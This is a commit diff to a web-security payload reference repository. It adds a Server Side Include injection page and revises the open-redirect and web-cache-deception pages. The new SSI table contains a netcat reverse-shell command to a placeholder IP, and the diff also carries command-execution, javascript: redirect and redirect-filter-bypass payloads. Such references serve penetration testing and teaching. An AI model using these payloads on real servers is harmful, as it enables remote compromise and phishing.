mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Open Redirect + SSI Injection
This commit is contained in:
parent
86e246dd03
commit
b68ce28c4b
3 changed files with 72 additions and 41 deletions
|
@ -4,53 +4,62 @@
|
|||
|
||||
## Summary
|
||||
|
||||
- [Open URL Redirection](#open-url-redirection)
|
||||
- [Summary](#summary)
|
||||
- [Exploitation](#exploitation)
|
||||
- [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx)
|
||||
- [Fuzzing](#fuzzing)
|
||||
- [Filter Bypass](#filter-bypass)
|
||||
- [Common injection parameters](#common-injection-parameters)
|
||||
- [References](#references)
|
||||
* [Labs](#labs)
|
||||
* [Exploitation](#exploitation)
|
||||
* [HTTP Redirection Status Code](#http-redirection-status-code)
|
||||
* [Fuzzing](#fuzzing)
|
||||
* [Filter Bypass](#filter-bypass)
|
||||
* [Common injection parameters](#common-injection-parameters)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
* [Root Me - HTTP - Open redirect](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Open-redirect)
|
||||
* [PortSwigger - DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
|
||||
|
||||
|
||||
## Exploitation
|
||||
|
||||
Let’s say there’s a `well known` website - https://famous-website.tld/. And let's assume that there's a link like :
|
||||
An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing.
|
||||
|
||||
```powershell
|
||||
https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account
|
||||
```
|
||||
After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL.
|
||||
What happens if we change the `famous-website.tld/account` to `evil-website.tld`?
|
||||
Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.
|
||||
|
||||
```powershell
|
||||
https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account
|
||||
Consider this example:
|
||||
Your web application has a feature that allows users to click on a link and be automatically redirected to a saved preferred homepage. This might be implemented like so:
|
||||
|
||||
```ps1
|
||||
https://example.com/redirect?url=https://userpreferredsite.com
|
||||
```
|
||||
|
||||
By visiting this url, if we get redirected to `evil-website.tld` after the sign-up, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials.
|
||||
An attacker could exploit an open redirect here by replacing the `userpreferredsite.com` with a link to a malicious website. They could then distribute this link in a phishing email or on another website. When users click the link, they're taken to the malicious website.
|
||||
|
||||
|
||||
## HTTP Redirection Status Code - 3xx
|
||||
## HTTP Redirection Status Code
|
||||
|
||||
HTTP Redirection status codes, those starting with 3, indicate that the client must take additional action to complete the request. Here are some of the most common ones:
|
||||
|
||||
- [300 Multiple Choices](https://httpstatuses.com/300) - This indicates that the request has more than one possible response. The client should choose one of them.
|
||||
- [301 Moved Permanently](https://httpstatuses.com/301) - This means that the resource requested has been permanently moved to the URL given by the Location headers. All future requests should use the new URI.
|
||||
- [302 Found](https://httpstatuses.com/302) - This response code means that the resource requested has been temporarily moved to the URL given by the Location headers. Unlike 301, it does not mean that the resource has been permanently moved, just that it is temporarily located somewhere else.
|
||||
- [303 See Other](https://httpstatuses.com/303) - The server sends this response to direct the client to get the requested resource at another URI with a GET request.
|
||||
- [304 Not Modified](https://httpstatuses.com/304) - This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.
|
||||
- [305 Use Proxy](https://httpstatuses.com/305) - The requested resource must be accessed through a proxy provided in the Location header.
|
||||
- [307 Temporary Redirect](https://httpstatuses.com/307) - This means that the resource requested has been temporarily moved to the URL given by the Location headers, and future requests should still use the original URI.
|
||||
- [308 Permanent Redirect](https://httpstatuses.com/308) - This means the resource has been permanently moved to the URL given by the Location headers, and future requests should use the new URI. It is similar to 301 but does not allow the HTTP method to change.
|
||||
|
||||
- [300 Multiple Choices](https://httpstatuses.com/300)
|
||||
- [301 Moved Permanently](https://httpstatuses.com/301)
|
||||
- [302 Found](https://httpstatuses.com/302)
|
||||
- [303 See Other](https://httpstatuses.com/303)
|
||||
- [304 Not Modified](https://httpstatuses.com/304)
|
||||
- [305 Use Proxy](https://httpstatuses.com/305)
|
||||
- [307 Temporary Redirect](https://httpstatuses.com/307)
|
||||
- [308 Permanent Redirect](https://httpstatuses.com/308)
|
||||
|
||||
## Fuzzing
|
||||
|
||||
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
|
||||
Replace `www.whitelisteddomain.tld` from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
|
||||
|
||||
To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
|
||||
To do this simply modify the `WHITELISTEDDOMAIN` with value `www.test.com `to your test case URL.
|
||||
|
||||
```powershell
|
||||
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
|
||||
```
|
||||
|
||||
|
||||
## Filter Bypass
|
||||
|
||||
Using a whitelisted domain or keyword
|
||||
|
@ -149,6 +158,7 @@ XSS from javascript:// wrapper
|
|||
http://www.example.com/redirect.php?url=javascript:prompt(1)
|
||||
```
|
||||
|
||||
|
||||
## Common injection parameters
|
||||
|
||||
```powershell
|
||||
|
@ -178,17 +188,13 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
|
|||
?continue={payload}
|
||||
?return_path={payload}
|
||||
```
|
||||
## Labs
|
||||
|
||||
* [DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* filedescriptor
|
||||
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
|
||||
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
|
||||
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
||||
* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
|
||||
* [Open-Redirect-Payloads - cujanovic](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||
* [Host/Split Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)
|
||||
* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
|
||||
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
|
||||
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
||||
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
|
||||
|
|
25
Server Side Include Injection/README.md
Normal file
25
Server Side Include Injection/README.md
Normal file
|
@ -0,0 +1,25 @@
|
|||
# Server Side Include Injection
|
||||
|
||||
> Server Side Includes (SSI) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Payloads](#payloads)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Payloads
|
||||
|
||||
| Description | Payload |
|
||||
|-------------------------|---------|
|
||||
| Print a date | `<!--#echo var="DATE_LOCAL" -->` |
|
||||
| Print all the variables | `<!--#printenv -->` |
|
||||
| Include a file | `<!--#include file="includefile.html" -->` |
|
||||
| Execute commands | `<!--#exec cmd="ls" -->` |
|
||||
| Doing a reverse shell | `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` |
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Server-Side Includes (SSI) Injection - OWASP](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
|
|
@ -4,8 +4,8 @@
|
|||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](#exploit)
|
||||
* [Methodology - Caching Sensitive Data](#methodology---caching-sensitive-data)
|
||||
* [Methodology - Caching Custom JavaScript](#methodology---caching-custom-javascript)
|
||||
* [Methodology - Caching Sensitive Data](#methodology---caching-sensitive-data)
|
||||
* [Methodology - Caching Custom JavaScript](#methodology---caching-custom-javascript)
|
||||
* [CloudFlare Caching](#cloudflare-caching)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
@ -25,7 +25,7 @@
|
|||
5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside.
|
||||
|
||||
|
||||
## Methodology - Caching Sensitive Data
|
||||
### Methodology - Caching Sensitive Data
|
||||
|
||||
**Example 1** - Web Cache Deception on PayPal Home Page
|
||||
1. Normal browsing, visit home : `https://www.example.com/myaccount/home/`
|
||||
|
@ -45,7 +45,7 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
|||
5. Attacker harvests JWT Credentials.
|
||||
|
||||
|
||||
## Methodology - Caching Custom JavaScript
|
||||
### Methodology - Caching Custom JavaScript
|
||||
|
||||
1. Find an un-keyed input for a Cache Poisoning
|
||||
```js
|
||||
|
|
Loading…
Reference in a new issue